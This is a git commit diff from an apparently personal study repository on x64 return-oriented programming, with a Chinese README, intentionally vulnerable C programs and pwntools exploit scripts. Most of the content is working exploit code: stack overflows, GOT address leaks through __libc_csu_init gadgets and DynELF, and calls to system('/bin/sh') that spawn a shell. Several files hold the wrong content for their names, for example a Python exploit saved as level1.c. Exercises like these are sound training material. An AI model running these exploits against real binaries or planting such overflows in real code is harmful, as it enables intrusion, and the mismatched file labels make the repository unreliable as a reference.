🎯 20170809-wooyundrops-rop/x64/lv1-lv3

Author: thinkycx

.gitignore

@@ -2,4 +2,4 @@ heap/*
 *.pyc
 peda-session-*.txt
 .gdb_history
-*.swp
+*.sw[po]

20170809-wooyundrops-rop/README.md

@@ -5,6 +5,7 @@
 ## 总结
 很早之前看的两篇经典的rop文章。今天复习了一下x86中rop的利用方法，漏洞是简单的栈溢出，根据利用方式不同分四个level。  
 
+## x86
 ### level1   
 ```
 编译
@@ -107,3 +108,47 @@ payload += p32(system_addr) + p32(0xdeafbeaf) + p32(bss_addr)
 p.sendline(payload)
 p.sendline("/bin/sh\x00")
 ```
+
+## x64
+64位程序：可使用的地址空间<0x7fffffffffff，传参从rdi rsi rdx rcx r8 r9 到栈。程序都开启了ASLR和NX，没看canary。
+### level1
+修改返回值为system函数的地址即可。
+### level2
+程序给出了system的地址，构造rop。`payload = 'A'*136 + p64(poprdi_ret)  + p64(binsh_addr) + p64(system_addr)`
+
+### level3
+程序仅有一个栈溢出，存在read和write的got表。思路和之前一致，泄漏write函数的实际地址，计算system的地址，构造rop。重点在于rop的构造，利用__libc_csu_init函数中的gadgets。
+```
+400600:   4c 89 ea                mov    %r13,%rdx
+  400603:   4c 89 f6                mov    %r14,%rsi
+  400606:   44 89 ff                mov    %r15d,%edi
+  400609:   41 ff 14 dc             callq  *(%r12,%rbx,8)
+  40060d:   48 83 c3 01             add    $0x1,%rbx
+  400611:   48 39 eb                cmp    %rbp,%rbx
+  400614:   75 ea                   jne    400600 <__libc_csu_init+0x40>
+  400616:   48 83 c4 08             add    $0x8,%rsp
+  40061a:   5b                      pop    %rbx
+  40061b:   5d                      pop    %rbp
+  40061c:   41 5c                   pop    %r12
+  40061e:   41 5d                   pop    %r13
+  400620:   41 5e                   pop    %r14
+  400622:   41 5f                   pop    %r15
+  400624:   c3                      retq  
+
+#write(1,write_got,0x8)
+
+main = 0x400587
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = write_got # call *(write_got)
+r13 = 0x8 # third
+r14 = write_got # second
+r15 = 0x1 # first
+payload = 'B'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+
+```
+同样，通过DynELF来完成了无libc的函数泄漏，完成了exp_withoutlibc.py版的exp。
+注意，system函数调用execve来执行/bin/sh，而execve的参数有三个，和栈上的内容有关系，尽量把无关紧要的偏移用\x00来填充。此外，DynELF不是很稳定，多打几次就好了。

20170809-wooyundrops-rop/x64/lv1/exp.py

@@ -0,0 +1,6 @@
+from pwn import *
+callsystem_addr = 0x4005b6 
+p = process('./level1')
+payload = 'A'*136 + p64(callsystem_addr)
+p.sendline(payload)
+p.interactive()

20170809-wooyundrops-rop/x64/lv1/level1

@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void callsystem()
+{
+    system("/bin/sh");
+}
+
+void vulnerable_function() {
+    char buf[128];
+    read(STDIN_FILENO, buf, 512);
+}
+
+int main(int argc, char** argv) {
+    write(STDOUT_FILENO, "Hello, World\n", 13);
+    vulnerable_function();
+}

20170809-wooyundrops-rop/x64/lv1/level1.c

@@ -0,0 +1,18 @@
+from pwn import *
+libc = ELF('./libc.so.6')
+
+
+system_offset = libc.symbols['system']
+binsh_offset = next(libc.search('/bin/sh'))
+p = process('./level2')
+context.log_level = 'debug'
+gdb.attach(pidof(p)[0])
+system_addr = int(p.recvline(),16)
+log.info(hex(system_addr))
+
+
+binsh_addr = system_addr - (system_offset - binsh_offset)
+poprdi_ret = 0x00000000004008b3 # : pop rdi ; ret
+payload = 'A'*136 + p64(poprdi_ret)  + p64(binsh_addr) + p64(system_addr)
+p.sendline(payload)
+p.interactive()

20170809-wooyundrops-rop/x64/lv1/payload

@@ -0,0 +1,22 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <dlfcn.h>
+
+void systemaddr()
+{
+    void* handle = dlopen("libc.so.6", RTLD_LAZY);
+    printf("%p\n",dlsym(handle,"system"));
+    fflush(stdout);
+}
+
+void vulnerable_function() {
+    char buf[128];
+    read(STDIN_FILENO, buf, 512);
+}
+
+int main(int argc, char** argv) {
+    systemaddr();
+    write(1, "Hello, World\n", 13);
+    vulnerable_function();
+}

20170809-wooyundrops-rop/x64/lv2/exp.py

@@ -0,0 +1,123 @@
+temp = ''' 1
+  400600:   4c 89 ea                mov    %r13,%rdx
+  400603:   4c 89 f6                mov    %r14,%rsi
+  400606:   44 89 ff                mov    %r15d,%edi
+  400609:   41 ff 14 dc             callq  *(%r12,%rbx,8)
+  40060d:   48 83 c3 01             add    $0x1,%rbx
+  400611:   48 39 eb                cmp    %rbp,%rbx
+  400614:   75 ea                   jne    400600 <__libc_csu_init+0x40>
+  400616:   48 83 c4 08             add    $0x8,%rsp
+  40061a:   5b                      pop    %rbx
+  40061b:   5d                      pop    %rbp
+  40061c:   41 5c                   pop    %r12
+  40061e:   41 5d                   pop    %r13
+  400620:   41 5e                   pop    %r14
+  400622:   41 5f                   pop    %r15
+  400624:   c3                      retq  
+
+write(1,write_got,0x8)
+
+main = 0x400587
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = write_got # call *(write_got)
+r13 = 0x8 # third
+r14 = write_got # second
+r15 = 0x1 # first
+payload = 'B'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+ 
+read(0,bss_addr,0x8)
+'''
+
+
+from pwn import *
+
+
+write_plt = 0x0000000000400430 
+write_got = 0x0000000000601018
+read_plt = 0x0000000000400440
+read_got = 0x0000000000601020
+main = 0x400587
+
+
+p = process('./level3')
+# gdb.attach(pidof(p)[0])
+context.log_level = 'debug'
+
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = write_got # call *(write_got)
+r13 = 0x8 # third
+r14 = write_got # second
+r15 = 0x1 # first
+payload = 'B'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+
+p.recvuntil('World\n')
+p.sendline(payload)
+write_addr = u64(p.recv(8))
+log.info("write addr:" +hex(write_addr))
+
+
+libc = ELF('./libc.so.6')
+system_offset = libc.symbols['system']
+write_offset = libc.symbols['write']
+system_addr = write_addr - (write_offset - system_offset)
+
+bss_addr = 0x0000000000601040
+# read(0,bss_addr,0x10)
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = read_got # call *(write_got)
+r13 = 0x10 # third
+r14 = bss_addr  # second
+r15 = 0x0 # first
+payload = 'B'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+
+p.recvuntil('World\n')
+p.sendline(payload)
+sleep(1)
+raw_input()
+p.send('/bin/sh\x00' + p64(system_addr))
+
+# system(bss_addr) 
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = bss_addr + 0x8 # call *(system_addr)
+r13 = 0x0 # third
+r14 = 0x0  # second
+r15 = bss_addr # first /bin/sh\x00
+payload = 'B'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0x0)*7 + p64(main)
+
+p.recvuntil('World\n')
+p.sendline(payload)
+p.interactive()
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+p.recv()
+
+p.recv()

20170809-wooyundrops-rop/x64/lv2/level2

@@ -0,0 +1,117 @@
+temp = ''' 1
+  400600:   4c 89 ea                mov    %r13,%rdx
+  400603:   4c 89 f6                mov    %r14,%rsi
+  400606:   44 89 ff                mov    %r15d,%edi
+  400609:   41 ff 14 dc             callq  *(%r12,%rbx,8)
+  40060d:   48 83 c3 01             add    $0x1,%rbx
+  400611:   48 39 eb                cmp    %rbp,%rbx
+  400614:   75 ea                   jne    400600 <__libc_csu_init+0x40>
+  400616:   48 83 c4 08             add    $0x8,%rsp
+  40061a:   5b                      pop    %rbx
+  40061b:   5d                      pop    %rbp
+  40061c:   41 5c                   pop    %r12
+  40061e:   41 5d                   pop    %r13
+  400620:   41 5e                   pop    %r14
+  400622:   41 5f                   pop    %r15
+  400624:   c3                      retq  
+
+write(1,write_got,0x8)
+
+main = 0x400587
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = write_got # call *(write_got)
+r13 = 0x8 # third
+r14 = write_got # second
+r15 = 0x1 # first
+payload = 'B'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+ 
+read(0,bss_addr,0x8)
+'''
+
+
+from pwn import *
+
+
+write_plt = 0x0000000000400430 
+write_got = 0x0000000000601018
+read_plt = 0x0000000000400440
+read_got = 0x0000000000601020
+main = 0x400587
+
+
+p = process('./level3')
+# gdb.attach(pidof(p)[0])
+context.log_level = 'debug'
+
+def leak(address):
+
+    poprbx = 0x40061a
+    movrdx = 0x400600
+    rbx = 0x0
+    rbp = 0x1
+    r12 = write_got # call *(write_got)
+    r13 = 0x8 # third
+    r14 = address #write_got # second
+    r15 = 0x1 # first
+    payload = '\x00'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+    payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+
+    p.recvuntil('World\n')
+    p.sendline(payload)
+    #write_addr = u64(p.recv(8))
+    #log.info("write addr:" +hex(write_addr))
+    data = p.recv(8)
+    log.debug("%#x => %s" % (address, (data or '').encode('hex')))
+    return data
+d = DynELF(leak,elf=ELF('./level3'))
+write_addr = d.lookup('write','libc')
+log.info('write_addr'+hex(write_addr))
+system_addr = d.lookup('system','libc')
+log.info('system_addr'+hex(system_addr))
+
+
+#libc = ELF('./libc.so.6')
+#system_offset = libc.symbols['system']
+#write_offset = libc.symbols['write']
+#system_addr = write_addr - (write_offset - system_offset)
+
+bss_addr = 0x0000000000601040
+# read(0,bss_addr,0x10)
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = read_got # call *(write_got)
+r13 = 0x10 # third
+r14 = bss_addr  # second
+r15 = 0x0 # first
+payload = '\x00'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0xdeadbeaf)*7 + p64(main)
+
+p.recvuntil('World\n')
+p.sendline(payload)
+sleep(1)
+#raw_input()
+p.send('/bin/sh\x00' + p64(system_addr))
+# gdb.attach(pidof(p)[0])
+# system(bss_addr) 
+poprbx = 0x40061a
+movrdx = 0x400600
+rbx = 0x0
+rbp = 0x1
+r12 = bss_addr + 0x8 # call *(system_addr)
+r13 = 0x0 # third
+r14 = 0x0  # second
+r15 = bss_addr # first /bin/sh\x00
+payload = '\x00'*136 + p64(poprbx) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) +p64(r14) + p64(r15)
+payload += p64(movrdx) + p64(0x0)*7 + p64(main)
+
+p.recvuntil('World\n')
+p.sendline(payload)
+p.interactive()
+
+

20170809-wooyundrops-rop/x64/lv2/level2.c

@@ -0,0 +1,13 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void vulnerable_function() {
+    char buf[128];
+    read(STDIN_FILENO, buf, 512);
+}
+
+int main(int argc, char** argv) {
+    write(STDOUT_FILENO, "Hello, World\n", 13);
+    vulnerable_function();
+}